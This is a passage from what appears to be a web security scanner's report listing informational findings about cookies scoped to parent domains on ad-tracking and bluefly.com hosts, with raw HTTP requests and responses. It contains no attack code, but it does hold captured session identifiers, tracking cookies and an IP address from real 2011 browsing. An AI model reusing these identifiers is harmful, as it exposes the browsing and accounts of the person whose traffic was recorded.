Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_G07608=82f4957c1a652091&G07608&0&4df33ff4&0&&4dcde361&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4df565ca&0&&4dcf65b3&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_J06575=82f4957c1a652091&J06575&0&4df565d1&0&&4dcf5608&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=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; rsi_segs_1000000=pUPNfkOBbgIUFmLCHes0KW6m3ZgQXnnQ2eTN9Oww/xC5n7e8t97wZrFpPHW1rmtgC9BicX3TKz2eCELNYrMRQ5Lqu2zxeyWWfvlSUcVQiomYts8ECBn+Htu45MvaZOVPjeiVX8Zn2dbYnd4CY/vI2hWo9+I5cVgso6DGe8kTro5udIZWJUPSA1+To+3klpCjRbw2Bad0n9tXCulP4zeaUmaiTlY9FzqRkpBXPIFsEjprZNo=; rtc_dUn8=MLsvsNFKMT5nJ5GuU8+Vm/S3bm5E5k5tMt3NnMGp0iPrRxZIAPXk1sWJJd0/criBZWlpdqwlBoSERTTrYCc/gUIlS1FVffKLHMTvhZ2/kRd2fDWGXo0973OxjVJvM4sWN23lbJTGpwkPvUZano6YF0AUV+JeNaoAt8+pSbKbdnsUNCEdADOFfSeqyYTDSDEIe2vG2nUWVvCrZ+mEz9AYFmDW2hNSjGBpITTC96K7z8YQwS3lvAdlwRZUXU+bm0B6nc2R3bprYgz8eD2Ov4Fe4x5XnK8Mne17nReJOAJZHIgz5IbuNCwt4XEkjz14AaSmzHNOpukOLKJpmILuaSsa9st9voigEMZmhjkK3mkyeJhApPsJEbab/3lzTO39mzt5Z54rippve02eRS7gFHqfCoB3HzprQxzA4Cf+P+TfZnKZ89g=; NETSEGS_D05509=82f4957c1a652091&D05509&0&4df56df0&0&&4dcf5b30&1f1a384c105a2f365a2b2d6af5f27c36; rsiPus_eR-U="MLsXsF8ubi5n4JDyzowlaElL3byjGsaEu/PCsfHs+PiZBmLkCOD/CYU4iQ1FIB9JIdEuByvn+LmEbSTfL+ykre7wDUIX/wZ6lnteDZlY2GW0rSpVxafl8+M3Fk56Oh4ptMD+hYqX/cAyWYPZh9GLnbzcK72OcuSYGrrJEpXB+DSR95aZykdxmdsZqoaEFcUJuWv1BvXF/JDG/GCNqis4ms/VQEqjV9l+cBVLcmp3g+IkQxuhqkO4h33GXxQRehGwbDMII/X908qfFBBE/BhoJgSDVTQJgbfrr9VStGZJoYAHBxqDSrtQR7zRdEPW+PODtnDjF0aDwrfsnCXsDZAllz5pIm7H8vTOz6Tp6rXuoEwC4tmm90X2zzZQgJINuTSRjmwwSlO3YJyhcZWsYanJtkzqYPXKdjC1vv14LmMCzQv0FuHGVbAUx1aTy5CEjIMWepRHnGiBj/50"; rsi_us_1000000="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"

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_eR-U=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_eR-U=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_cq85="MLsXsF8ubi5n4JDyzowlSBbxpQnwGsaEu/PC8n+5VFKBZFiot29LyxVRkzZAFjNpcJ1iCf5x8wb47OfER+70+KpE+UnSMkbFSIrdk96nO3UaWMTESWUpK3OqyDwU+EA/5R8Xf2DD8x4RmpjwIzLVwKiwQ3OFNmbSHqqZn5iMigi7JoO6ztNRmL1mxYWhBSC0DILl88ybW6M+cQpWnZDY0MdXGPdCs6Dk6T/5787NFvTrHYiNQkaAQXrvVknibEJ2Q3EEI6eA8RHWXnsWl3dsumEcJ4AZQLWPtn8GUbAKtpnDk4QG8tRZvs9uUMCro5ahZOoKWY/NuurXK+xiuXPUMnMlb9G3jNnS1qDw5q+tUhXm3KfSyzsyTJOTgNUtMpTnWzmQrnEghGoIuyZuaegLwU8Hbd5/IEQzTkZ8de2MzHz5ZbekRfbuw54TFc+0wtgB9f5ZYPt8rOk="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUMdJE9HCAYYlW23lB0u4DcmSH3vrseeRRdc+/iC2/EpD4wnnWVpr8KNuLTYoCJisXn5HT6xtGlexMb/gCd8NEgmVWrScu+R6IK9f5q3gdIzGYbvvIWq2gHYcb6WtSO2eXRkOJUg0hglaqnjXXwOtkFUCqodVLjnzxSp/ocGHhDb1e+NKdqA60VtitzaEjn333JOpoKabSD/s+4LcFeRFZTgI55WVwB1oQEDOQBU6Kcx3qbkKAZeLnuEILa513lbVZwiijORoR9b+gLscYYm9oc4YXZYG+kKyAKVGk23nIxNwnZE+ztabap2OEbvi5J9kgByXK6iiY36G9CAOp6W3g6HPohG+1esZzkKXUpCJfNXJuWR/nAE4eRcT/QWS3w947o39G+CKm8b1hgMDcaOwXgr3SDf1gr6+Ur3tB69BQlRKyHuBuJwKsma4HIdpkK0aaox773kdEYdgUlodh7asCKRrRcMMN3FLt/HISxWSaLQ30YAt1VAMwzttcWOYkEu+j0G7Q9hAKyh18R9a7kSQoFt3+9406AJ0FDSG0olZv0hovf+CndgqByq4SVT5LuB/xh7yEugipKJGSdZw9+k8qOSyv7ni4dw8f5kbgwpNfRIQ4epfWPOOy4uiHB5JZ7B/iTUk77AIXjpdUzD4Am1JWZ3fEOvztWHc4smVf/rFfjhsENJq/YEjZ8GZUinFSFyJWDDCKPQ8It6StqkbwjLbk25MlGZZer7Nk4G1fwGl69syX8EgKN+qKDQqnJmm9PC9SfkTQoBtDA1jsm7/Io7mjIY/Bp/ykaRtJZsNvAN4KR01lPxjycRQLEMblStMerh9Bqya5ugvWOHNRCfJ9ZFRMFWmNgmblJiFUoUyJIwzFeLMss/mSBKB2IJ2CztZJjB/Eo+Q4k27iRW/HbnkgY6z6wwSdm2l4MKREXIPLmRzVQ8lkszqQl1S8Z7mjnNwqtKTjpyn6PKTiX/9dh5XffRWEzn0zymQBTAy55jjM7Ilqs1haSE+cov/8/4FeGVFGUebrMZKyv9aG2VN9zz6aOQJLA22YS4NdmcEQwNAT2mjcPDxTrEzm0SMIk4uw=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Location: http://ad.yieldmanager.com/pixel?id=708341&t=2
Content-Length: 0
Date: Mon, 16 May 2011 10:42:03 GMT


12.22. http://ads.revsci.net/adserver/ako

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain, so every host under that parent domain receives them, not only the host that set them. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?rsi_noads=1&rsi_pixel=1&rsi_account=47C4A5B52F56DA1048BE0364F22EE23B&rsi_site=7CF6289AC01B12B6FAA4EB07CBB7EE34&rsi_event=D00B721BDB5235B5FF65F9D8E524EF85 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.armaniexchange.com/category/womens.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_G07608=82f4957c1a652091&G07608&0&4df33ff4&0&&4dcde361&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4df565ca&0&&4dcf65b3&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_J06575=82f4957c1a652091&J06575&0&4df565d1&0&&4dcf5608&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=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; rsi_segs_1000000=pUPNcDPB7QMUFVJmHElW1WAhFpB0I5EmV+QHrdRrcAMkOX+o7LQjAQv0aGumjYcA+pD55MfuOfQbGooH3qorp++zHuX/61m4ao1z4yL4Lb3cyf2EkQb/3ZOSwdnh6MSu2Um4QVZJKClGNz2Fl9QeLKxco3pM/j3xxqXi/RBfDYQLHw069nJi4GhHujSDyULrAXw98qMzqzoEqWE=; rtc_6axN=MLsvrdMvcT5jJQFErn5VSDYGHlHr5G4IUDwGBCOQN50vl8AxTgkQ69k2sWbYhD5swupGFuttZZ30pjREZ/ZkKkhmVOC4XP9dHEpHAm3ADaku92HBduCPjDheEZyi3USKjMyJU8PKvSGf6dbgKbkkF1T9nPoTyICKBODL5dWNTWGJSo//SZoNqh0jXWrCVj5fE0hG1/Ew1855Q3kGOJISwLZwyFyrdDpPp9pEr5K7YRGtS1DhqDKb+B3xI4h5pUmK196H1VYARyez77DbY8fCN3YqmgkgAm74R4TtPLq8byYJ7dh3Jpzg7zgqcfYD+8HJFFf4m0VurVwRBH7s; rsiPus_Ue6V="MLsfsF8OZi5n4JASs5Bk9KNTJTvS8f2Fu11GHPEzhKyi3GQrQ7BmTve2OJAm5dkicVDq6exz8/7mVp8gLWwFrCZXqjnrP4dY+oskzV6Lm6fDGU/pc7sD4QgyAm917NYUdYZyl4Ge77s9UIFZQ17LzY6FmFr+dbOm/q3NRviYsxYxEdT4BuWckICBhlynfvy70YiGCMlO6qasmF2ihg+pO2oJnW6u/sK+jrGeJcPD5bkfmxdZkcxFCdRcP+5WTqdsCmcLf0Ex4rcKXrvjrnu0sTHtBT5McF9fDxSJ/5F4rhGctF7ufabWD//giGZVhajmlKJ5/ghKjM+xp5IlgyRWbpVdfNtrcTGZkm4rs+yrKxT60qWH9+m+GDthRw4NqX5srVtjKqBYmXFoYwBh69bL8neIN/fo324IeUZkNTAbckLX2a5MG66S3qymz5fMI7YY007gYORN"; rsi_us_1000000="pUMdJE1HMBYc1A1qdrcIJDxQsPOLjDoxzTAyNtIHury3GtT68G8x1wl2w/HHUtqHQsCeBaP1P6FXhHb2gFvElddwSHYuHGTrUzB1JmqVJnWnfFraXAJ0HXSsWsKsenfLwmMuKZfjvBEQWNpdP7FfD8xp5hLRMwezltge4Do9QX1mZyppg6fuXPp4j9WR9yOzLIEyFyYvYnmhyaVpmd2KE5SMk4UkzjeJic7ys+Ry7RIyWuckExTC3z42TMmr1xnTwvQxn6DymxrH6BA8apr+dsG+HX4oH3b2M5RjVR9OEduFKxCoKYg3hqhEwyrtCz0XpgfqRX4gqNohc1/W2RnNT975CgaLAwjh11y5uqnDue9wUha5TfzEIxMAivPyPaOEYCti+DNtlXFK/0jfGgfxlCevyrLhnDrN9WTkWTTkovOWctoce/yYdYwnZjyAK/WrNLPaLcyahlyzYtXLzEW2+TB6t7lvfvkKKVoTjyd4+fq/G/OzWz/okwSYqsojVcuOKXZfkvZQFM+uZ7jdB58SXgHb34YzYLTOk4Oqpvvtbh8FiVnclF92CFDfw8dICduFuGmKuoygMWLbrVVOdFM+aW/0MIZPT47Y8WbzHfFrk3FeGzSTYzL9KCoaL+xOhl9sHKdX2YJ5S2NsdXMCRPfLV1GAMP4xC+NpacNHSzF0laIoxYEIa/ODB2HQ2uznY9aWOpFh+wcRIXA8Eo1bmEftV4VMIPjGcSoikr9RSBZ0GzGq+KYm17TfZzW85AnXZZMkWMAzBqSS0J7jIKDrJPSeuTPgBB2gffcvWmJT0GdRXvgBEVFgEi7KVR8PyfjcHGSqmBKdP1LCkTSqLigTCBX9xnHOu2x1pnCXrkbZavqIN2ckvtAdbWIr3/gJvX/efgFmx6k3gdoqrRSCjkazJNqrZiEmZRpOkGChbBt6n2xW6mdY0EYYU85F0+JxyWlaMlMzMJlE5djHMETBllGwYzgApDsNyhbc007zWOjl31mNUCRbmDJBE9Sj45uNmsYg4hAkOLV2WFVOj+5UKDffup1s6paMmFPN9PB7E+cmdyXEMGtKOnL1ng=="

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Ue6V=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Ue6V=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_L-X0="MLsXsF8OZi5n4BC7CEQANzy/1tkH/1R6T7S5z2Fu/1ZdyDcMqjB3UfR+EgHU8X4ksrVgy/Rz8x5trlkaRECoNMLefiivRJt2FSces26J094xJ83B/839DFleaBDLRohSlAV8cpPInIvVz89Y7xsejcWODt9R/gyFvKssIz6J1ZKnfIDZnh498xJl7+/KNV8X6NaOn5sOc/2crutdINmb6SjYm5/o39bKqJ3lsv/ufqykgLW6bFGCdxMIct6rbb03ZFShfm9rBIi4EFNh71KUzfigSzTGIl979lRdhOaxbsRsHH/IHdX3B6eZu5yScSdoRXhv4T+NLxAHJeaSWhd2iSuscBVEm14yRic99IhVBxJCQAQfxVHWrrWMmcSIot2Xc9zXZmllbUJ5MUniuwtpDzfMfJGkIdV2LYIBTuaw56nZrsRqAQQu1rdWet9dyZycwRd1bxIYIaFo+WI="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Location: http://ad.yieldmanager.com/pixel?id=1052401&t=2
Content-Length: 0
Date: Mon, 16 May 2011 01:58:30 GMT


12.23. http://adserver.veruta.com/track.fcgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserver.veruta.com
Path:   /track.fcgi

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain, so every host under that parent domain receives them, not only the host that set them. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /track.fcgi?merchantid=854445219&category=100199&itemid=&eventid=0&ifmode=1&recommend=%7B%22dc%22%3A%224699979325968%22%2C%22slc%22%3A14%2C%22extra%22%3A%7B%22cl%22%3A%22ARMANIEXCHANGE%22%2C%22cm%22%3A%2220772879917%22%2C%22ts%22%3A%2221758514%22%7D%2C%22rc%22%3A%5B%221849367843%22%2C%2222084645718%22%2C%221849367842%22%2C%2222084642104%22%2C%2219522266448%22%2C%2222084646129%22%2C%2222084645710%22%2C%2222084645561%22%2C%2222084645689%22%2C%2220952419112%22%2C%2219779857694%22%2C%2223186672305%22%2C%2220399498260%22%2C%2220796345994%22%2C%2220796346228%22%2C%2220796346434%22%2C%2219522267016%22%2C%2220796346298%22%2C%2220796346442%22%2C%2219522266459%22%5D%7D HTTP/1.1
Host: adserver.veruta.com
Proxy-Connection: keep-alive
Referer: http://t.p.mybuys.com/webrec/wr.do?client=ARMANIEXCHANGE&sessionId=6451B347-829F-5F10-0394-7AA048201BB1&pt=hcat&categoryname=Womens&ckc=100199&mbcc=736A768E-F798-53C9-B056-8FE338824CC8&lang=en&v=4.7.3&mbts=1305510850857&purl=http%3A%2F%2Fwww.armaniexchange.com%2Fcategory%2Fwomens.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ueid=1461734246|1305465412|8|2; cmid=20772879917

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 16 May 2011 01:54:22 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Thu, 01-Jan-1970 00:00:00 GMT
P3P: policyref="http://www.veruta.com/w3c/p3p.xml",CP="NOI DSP COR NID"
Pragma: no-cache
Set-cookie: ueid=1461734246|1305465412|8|2; expires=Tue, 15-May-2012 01:54:22 GMT; path=/; domain=.veruta.com;
Set-cookie: cmid=20772879917; expires=Tue, 15-May-2012 01:54:22 GMT; path=/; domain=.veruta.com;
Content-Length: 65

<html><head><title></title></head><body><div></div></body></html>

12.24. http://b.scorecardresearch.com/p

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /p

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain, so every host under that parent domain receives it, not only the host that set it. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p?c1=8&c2=2101&c3=1234567891234567891&c15=&cv=2.0&cj=1 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1564432;type=homep126;cat=homep272;ord=1;num=3148241261951.6255?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=64dfc632-184.84.247.65-1305305561

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Mon, 16 May 2011 01:55:23 GMT
Connection: close
Set-Cookie: UID=64dfc632-184.84.247.65-1305305561; expires=Wed, 15-May-2013 01:55:23 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;

12.25. http://cdn.media.bluefly.com/media/templates/images/topnav/bluefly_blue_navi_logo.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.media.bluefly.com
Path:   /media/templates/images/topnav/bluefly_blue_navi_logo.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain, so every host under that parent domain receives it, not only the host that set it. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /media/templates/images/topnav/bluefly_blue_navi_logo.gif HTTP/1.1
Host: cdn.media.bluefly.com
Proxy-Connection: keep-alive
Referer: http://www.bluefly.com/myfly/forgot_password.jsp
Cache-Control: max-age=0
If-Modified-Since: Wed, 19 Aug 2009 15:02:34 GMT
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
If-None-Match: "5fe2-8fc-4717fecc59680"
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=7D2A76E47F5F107F24CCB1BBDF37F7B5; __utmz=9200358.1305510900.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=9200358.576523501.1305510900.1305510900.1305510900.1; __utmc=9200358; bn_u=6923549130717770549; bn_cd=d%26g%26s%26r%3D0.1; bnTrail=%5B%22http%3A%2F%2Fwww.bluefly.com%2F%22%2C%22http%3A%2F%2Fwww.bluefly.com%2Fmyfly%2Flogin.jsp%3Bjsessionid%3DONzgfawlrUIPLStla7ZseA**.bluefly_node4%22%5D; SSLB=1; SSID=AwCU-CkAAAAA6YPQTRybEAHpg9BNAgAAAAAAAAAAAAAAAABO-9BNAAAAAAAAAAAAAAA; SSSC=1.G5607126572844751644.2.0.0; SSRT=TvvQTQE; TLTHID=A7FAD6BA7FA6107F3120DAB2BEB63E44

Response

HTTP/1.0 304 Not Modified
Date: Mon, 16 May 2011 10:24:20 GMT
Server: Apache
ETag: "5fe2-8fc-4717fecc59680"
Expires: Mon, 16 May 2011 10:29:20 GMT
Cache-Control: max-age=300
Vary: Accept-Encoding
Set-Cookie: TLTHID=A935623E7FA6107F30EEA0CB0E3247A1; Path=/; Domain=.bluefly.com
X-Cache: MISS from cdce-nym011-013.nym011.internap.com
X-Cache: MISS from cdce-nym011-013.nym011.internap.com
Via: 1.1 cdce-nym011-013.nym011.internap.com:1080 (squid/2.7.STABLE7), 1.0 cdce-nym011-013.nym011.internap.com:80 (squid/2.7.STABLE7)
Connection: keep-alive


12.26. http://cdn.www.bluefly.com/media/css/custom-theme/bluefly_jqui.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.www.bluefly.com
Path:   /media/css/custom-theme/bluefly_jqui.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain, so every host under that parent domain receives it, not only the host that set it. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /media/css/custom-theme/bluefly_jqui.css HTTP/1.1
Host: cdn.www.bluefly.com
Proxy-Connection: keep-alive
Referer: http://www.bluefly.com/myfly/forgot_password.jsp
Cache-Control: max-age=0
If-Modified-Since: Tue, 17 Mar 2009 19:55:01 GMT
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
If-None-Match: "41b0-6881-46555f1406f40"
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=7D2A76E47F5F107F24CCB1BBDF37F7B5; __utmz=9200358.1305510900.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=9200358.576523501.1305510900.1305510900.1305510900.1; __utmc=9200358; bn_u=6923549130717770549; bn_cd=d%26g%26s%26r%3D0.1; bnTrail=%5B%22http%3A%2F%2Fwww.bluefly.com%2F%22%2C%22http%3A%2F%2Fwww.bluefly.com%2Fmyfly%2Flogin.jsp%3Bjsessionid%3DONzgfawlrUIPLStla7ZseA**.bluefly_node4%22%5D; SSLB=1; SSID=AwCU-CkAAAAA6YPQTRybEAHpg9BNAgAAAAAAAAAAAAAAAABO-9BNAAAAAAAAAAAAAAA; SSSC=1.G5607126572844751644.2.0.0; SSRT=TvvQTQE; TLTHID=A5D332927FA6107F321CBBFE605BF4CE

Response

HTTP/1.0 304 Not Modified
Date: Mon, 16 May 2011 10:24:17 GMT
Server: Apache
ETag: "41b0-6881-46555f1406f40"
Expires: Mon, 16 May 2011 10:29:17 GMT
Cache-Control: max-age=300
Vary: Accept-Encoding
Set-Cookie: TLTHID=A7EF03BC7FA6107F316B91C463EC5928; Path=/; Domain=.bluefly.com
X-Cache: MISS from cdce-nym011-019.nym011.internap.com
X-Cache: MISS from cdce-nym011-018.nym011.internap.com
Via: 1.1 cdce-nym011-019.nym011.internap.com:1080 (squid/2.7.STABLE7), 1.0 cdce-nym011-018.nym011.internap.com:80 (squid/2.7.STABLE7)
Connection: keep-alive


12.27. http://cdn.www.bluefly.com/media/css/mybluefly.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.www.bluefly.com
Path:   /media/css/mybluefly.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain, so every host under that parent domain receives it, not only the host that set it. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /media/css/mybluefly.css HTTP/1.1
Host: cdn.www.bluefly.com
Proxy-Connection: keep-alive
Referer: http://www.bluefly.com/myfly/forgot_password.jsp
Cache-Control: max-age=0
If-Modified-Since: Tue, 09 Nov 2010 23:11:12 GMT
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
If-None-Match: "771a-ba4f-494a6db536400"
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=7D2A76E47F5F107F24CCB1BBDF37F7B5; __utmz=9200358.1305510900.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=9200358.576523501.1305510900.1305510900.1305510900.1; __utmc=9200358; bn_u=6923549130717770549; bn_cd=d%26g%26s%26r%3D0.1; bnTrail=%5B%22http%3A%2F%2Fwww.bluefly.com%2F%22%2C%22http%3A%2F%2Fwww.bluefly.com%2Fmyfly%2Flogin.jsp%3Bjsessionid%3DONzgfawlrUIPLStla7ZseA**.bluefly_node4%22%5D; SSLB=1; SSID=AwCU-CkAAAAA6YPQTRybEAHpg9BNAgAAAAAAAAAAAAAAAABO-9BNAAAAAAAAAAAAAAA; SSSC=1.G5607126572844751644.2.0.0; SSRT=TvvQTQE; TLTHID=A5D332927FA6107F321CBBFE605BF4CE

Response

HTTP/1.0 304 Not Modified
Date: Mon, 16 May 2011 10:24:18 GMT
Server: Apache
ETag: "771a-ba4f-494a6db536400"
Expires: Mon, 16 May 2011 10:29:18 GMT
Cache-Control: max-age=300
Vary: Accept-Encoding
Set-Cookie: TLTHID=A7FAD6BA7FA6107F3120DAB2BEB63E44; Path=/; Domain=.bluefly.com
X-Cache: MISS from cdce-nym011-013.nym011.internap.com
X-Cache: MISS from cdce-nym011-013.nym011.internap.com
Via: 1.1 cdce-nym011-013.nym011.internap.com:1081 (squid/2.7.STABLE7), 1.0 cdce-nym011-013.nym011.internap.com:80 (squid/2.7.STABLE7)
Connection: keep-alive


12.28. http://cdn.www.bluefly.com/media/templates/images/myaccount/login-submit.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.www.bluefly.com
Path:   /media/templates/images/myaccount/login-submit.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain, so every host under that parent domain receives it, not only the host that set it. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /media/templates/images/myaccount/login-submit.gif HTTP/1.1
Host: cdn.www.bluefly.com
Proxy-Connection: keep-alive
Referer: http://www.bluefly.com/myfly/login.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=7D2A76E47F5F107F24CCB1BBDF37F7B5; __utmz=9200358.1305510900.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bnTrail=%5B%22http%3A%2F%2Fwww.bluefly.com%2F%22%2C%22http%3A%2F%2Fwww.bluefly.com%2Fmyfly%2Flogin.jsp%3Bjsessionid%3DONzgfawlrUIPLStla7ZseA**.bluefly_node4%22%5D; SSID=AwCU-CkAAAAA6YPQTRybEAHpg9BNAgAAAAAAAAAAAAAAAABO-9BNAAAAAAAAAAAAAAA; SSSC=1.G5607126572844751644.2.0.0; SSRT=TvvQTQE; __utma=9200358.576523501.1305510900.1305510900.1305541459.2; __utmc=9200358; __utmb=9200358.1.10.1305541459; bn_u=6923549130717770549; bn_cd=d%26g%26s%26r%3D0.1; SSLB=1; TLTHID=AD5EC21A7FA6107F30C796F19AE9AFF0
If-None-Match: "3839-bba-450e97f3abac0"
If-Modified-Since: Mon, 30 Jun 2008 22:08:19 GMT

Response

HTTP/1.0 304 Not Modified
Date: Mon, 16 May 2011 10:24:29 GMT
Server: Apache
ETag: "3839-bba-450e97f3abac0"
Expires: Mon, 16 May 2011 10:29:29 GMT
Cache-Control: max-age=300
Vary: Accept-Encoding
Set-Cookie: TLTHID=AEF6BF247FA6107F3291AC8BAB1516C6; Path=/; Domain=.bluefly.com
X-Cache: MISS from cdce-nym011-011.nym011.internap.com
X-Cache: MISS from cdce-nym011-010.nym011.internap.com
Via: 1.1 cdce-nym011-011.nym011.internap.com:1080 (squid/2.7.STABLE7), 1.0 cdce-nym011-010.nym011.internap.com:80 (squid/2.7.STABLE7)
Connection: keep-alive


12.29. http://cdn.www.bluefly.com/media/templates/images/myaccount/subh-create-account.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.www.bluefly.com
Path:   /media/templates/images/myaccount/subh-create-account.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain, so every host under that parent domain receives it, not only the host that set it. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /media/templates/images/myaccount/subh-create-account.gif HTTP/1.1
Host: cdn.www.bluefly.com
Proxy-Connection: keep-alive
